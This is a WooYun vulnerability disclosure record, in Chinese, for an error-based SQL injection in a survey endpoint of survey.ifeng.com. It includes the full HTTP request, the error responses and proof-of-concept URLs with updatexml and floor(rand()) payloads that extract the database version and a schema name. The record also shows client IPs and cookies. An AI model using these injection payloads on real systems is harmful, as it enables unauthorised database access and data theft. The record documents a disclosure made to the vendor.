乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-26: 细节已通知厂商并且等待厂商处理中 2015-02-27: 厂商已经确认,细节仅向厂商公开 2015-03-09: 细节向核心白帽子及相关领域专家公开 2015-03-19: 细节向普通白帽子公开 2015-03-29: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
凤凰网某站存在SQL报错注入可直接读取信息
Host: survey.ifeng.com参数surid
GET /survey/request.php?callback=jsonp1424157819222&act=postsurvey&surid=2616'&sur%5B5491%5D%5B%5D=21758&ref=http://bbs.ifeng.com/talk/special/index.shtml HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://bbs.ifeng.com/talk/special/index.shtmlCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: survey.ifeng.comCookie: Q37_sid=SoraD6; Q37_oldtopics=D5898341D18938212D18939153D18938341D18938190D18939052D18937946D18404838D18938230D17144416D18492322D18870175D18689737D18846108D15119594D15109969D15180577D18936949D18936953D18938709D18938715D18938707D18938712D; Q37_fid284=1424155688; Q37_visitedfid=349D491D500D497D469D379D364D354D728D218D550; Q37_fid218=1424143815; Q37_fid364=1424146788; Q37_fid354=1424072043; Q37_fid453=1424138799; Q37_fid379=1424144618; Q37_fid469=1424080280; Q37_fid497=1424087992; Q37_fid499=1424143254; Q37_fid500=1424148976; Q37_fid491=1424080870Accept-Encoding: gzip, deflateHTTP/1.1 200 OKServer: nginx/0.8.53Date: Tue, 17 Feb 2015 07:32:18 GMTContent-Type: text/html;charset=utf-8Vary: Accept-EncodingLoad-Balancing: survey144Set-Cookie: array_pkic2=rs_http_pkandsurvey_145Connection: Keep-aliveContent-Length: 1187<div style="position:absolute;font-size:11px;font-family:verdana,arial;background:#EBEBEB;padding:0.5em;"> <b>MySQL Error</b><br> <b>Message</b>: MySQL Query Error<br> <b>SQL</b>: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","surid":"2616\\'","sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","ip":"116.231.89.203"}')<br> <b>Error</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtm' at line 1<br> <b>Errno.</b>: 1064<br> <a href="http://faq.comsenz.com/?type=mysql&dberrno=1064&dberror=You%20have%20an%20error%20in%20your%20SQL%20syntax%3B%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20%27sur%22%3A%7B%225491%22%3A%5B%2221758%22%5D%7D%2C%22ref%22%3A%22http%3A%5C%2F%5C%2Fbbs.ifeng.com%5C%2Ftalk%5C%2Fspecial%5C%2Findex.shtm%27%20at%20line%201" target="_blank">Click here to seek help.</a> </div>
POC:
http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%20updatexml%281,concat%280x7e,%28SELECT%20@@version%29,0x7e%29,1%29%29%23 MySQL ErrorMessage: MySQL Query ErrorSQL: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","sur":{"5491":["2175"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","surid":"2616\\'+ updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))#","ip":"116.237.88.204"}')Error: XPATH syntax error: '~5.1.45-Community-Server-log~'Errno.: 1105Click here to seek help.
http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,schema_name,0x7e%29%20FROM%20information_schema.schemata%20LIMIT%201,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%29%23Error: Duplicate entry '~ifeng_survey~1' for key 'group_key'
危害等级:高
漏洞Rank:10
确认时间:2015-02-27 18:31
非常感谢您对凤凰网信息安全的帮助。
暂无